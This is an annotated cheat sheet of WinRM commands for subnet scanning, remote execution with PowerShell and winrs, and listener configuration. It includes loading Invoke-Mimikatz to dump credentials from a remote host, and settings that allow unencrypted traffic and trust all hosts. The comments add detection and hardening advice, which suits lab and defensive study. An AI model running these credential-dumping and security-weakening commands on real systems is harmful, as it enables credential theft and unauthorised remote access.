Windows Remote Management

Tips

# WinRM (Windows Remote Management) command notes.
# The lines below mix three environments: an Alpine Linux shell (apk, nmap),
# PowerShell (Invoke-*, Enable-PSRemoting, Set-Item) and the Windows command
# line tools winrm / winrs. This is a reference list, not one runnable script.

# Install the nmap NSE script and library packages with Alpine's package manager.
apk add nmap-scripts nmap-nselibs
# Service/version scan of the default WinRM ports (5985 = HTTP, 5986 = HTTPS)
# across the 192.168.0.0/24 range; shows which hosts expose a WinRM listener.
nmap -p 5985,5986 -sV 192.168.0.0/24
# Run a script block on the remote computer through PowerShell remoting;
# here it lists the root of C:\ on TARGET.
Invoke-Command -ComputerName TARGET -ScriptBlock { dir c:\ }
# Load the Invoke-Mimikatz script from the current directory and run it against
# TARGET. This is a credential-dumping tool; for defenders, PowerShell script
# block logging (event ID 4104) and AMSI are the usual places it shows up, and
# LSA protection / Credential Guard reduce what it can read.
Import-Module ./Invoke-Mimikatz.ps1
Invoke-Mimikatz -ComputerName TARGET
# Configure this machine to accept PowerShell remoting; -Force suppresses the
# confirmation prompts.
Enable-PSRemoting -Force
# Apply the default WinRM configuration (service, listener, firewall exception).
winrm quickconfig
# Let the WinRM *client* send unencrypted traffic. This weakens transport
# security: credentials and command output can be read on the wire. Leave it
# "false" outside a lab and use an HTTPS listener instead.
# NOTE(review): PowerShell parses @{...} as a hashtable, so from a PowerShell
# prompt this argument usually has to be quoted; confirm the intended shell.
winrm set winrm/config/Client @{AllowUnencrypted = "true"}
# Set the client's TrustedHosts list to the wildcard, i.e. every host is
# trusted without mutual authentication. Prefer an explicit host list, and
# reset this value after testing.
Set-Item WSMan:localhost\client\trustedhosts -value *

# List the configured WinRM listeners (transport, port, address).
winrm enumerate winrm/config/Listener

# Run quickconfig for the HTTP transport explicitly.
winrm quickconfig -transport:http

# Same listener enumeration as above; "e" is the short form of "enumerate".
winrm e winrm/config/listener
# Remote execution
# winrs runs a command on the remote WinRM endpoint given by -r:. The first
# line opens a remote cmd session, the second lists the members of the remote
# local Administrators group. Both use the plain-HTTP endpoint.
# Detection: sessions are recorded in the Microsoft-Windows-WinRM/Operational
# log, and remote commands run under winrshost.exe (winrs) or wsmprovhost.exe
# (PowerShell remoting) on the target.
winrs -r:http://WIN-2NE38K15TGH/wsman "cmd"
winrs -r:http://WIN-2NE38K15TGH/wsman "net localgroup administrators"